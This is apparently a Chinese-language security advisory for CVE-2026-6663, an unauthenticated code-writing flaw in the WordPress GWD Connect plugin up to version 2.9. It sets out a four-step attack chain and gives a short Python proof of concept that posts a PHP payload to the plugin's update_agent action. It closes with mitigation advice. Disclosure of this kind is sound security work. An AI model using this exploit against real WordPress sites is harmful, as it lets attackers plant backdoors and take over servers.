CVE-2026-6663 WordPress GWD Connect插件代码执行漏洞

漏洞信息

漏洞编号

CVE-2026-6663

漏洞类型

远程代码执行 (RCE)

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress GWD Connect Plugin

漏洞概述

WordPress GWD Connect插件在所有2.9及以下版本中存在权限缺失漏洞，导致受限代码执行风险。该漏洞源于插件默认未配置API密钥时，其独立代理端点未进行身份验证。未经身份验证的攻击者可利用此缺陷，通过发送特制请求触发update_agent动作，将任意PHP代码写入服务器文件，进而在特定环境下实现远程代码执行，威胁服务器安全。

技术细节

该漏洞的核心在于WordPress插件“GWD Connect”的独立代理处理机制中存在安全缺陷。具体而言，插件中的`gwd-backup.php`和`gwd-logs.php`文件作为独立端点运行，设计用于处理备份和日志功能。然而，开发者在实现`update_agent`动作时，未对当前用户的身份状态进行严格的校验。在默认安装且未配置API密钥的情况下，系统跳过了认证检查。攻击者可以利用这一逻辑漏洞，构造恶意的HTTP POST请求，将包含PHP后门代码的数据通过`update_agent`参数传递给服务器。服务器接收到数据后，会将其直接写入到插件目录下的代理文件中。由于写入的文件是可执行的PHP文件，攻击者随后只需通过浏览器访问该文件，即可在服务器端执行任意系统命令，完全控制受影响的网站。此利用过程不需要管理员权限，但通常限于未注册的安装环境。

攻击链分析

STEP 1

侦察

识别使用WordPress GWD Connect插件且版本低于或等于2.9的目标网站。

STEP 2

漏洞验证

访问gwd-backup.php或gwd-logs.php端点，检查是否在未配置API密钥的情况下允许未认证访问。

STEP 3

代码注入

发送包含恶意PHP代码的POST请求至update_agent动作，利用未授权漏洞将代码写入服务器文件。

STEP 4

代码执行

访问已被写入恶意代码的文件，触发PHP引擎执行代码，从而获取服务器权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit target URL (example)
target_url = "http://target-site.com/wp-content/plugins/graphic-web-design-inc/gwd-backup.php"

# Malicious PHP code to write
php_payload = "<?php phpinfo(); ?>"

# Data payload for the vulnerable action
payload_data = {
    "action": "update_agent",
    "content": php_payload
}

try:
    # Send POST request to inject code
    response = requests.post(target_url, data=payload_data)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully.")
        print("[+] Check the agent file to verify code execution.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

GWD Connect <= 2.9

防御指南

临时缓解措施

建议立即将GWD Connect插件更新至最新修复版本。若无法立即升级，应确保在插件设置中配置了API密钥，或者通过Web服务器配置（如.htaccess或Nginx规则）严格限制外部对`gwd-backup.php`和`gwd-logs.php`文件的直接访问。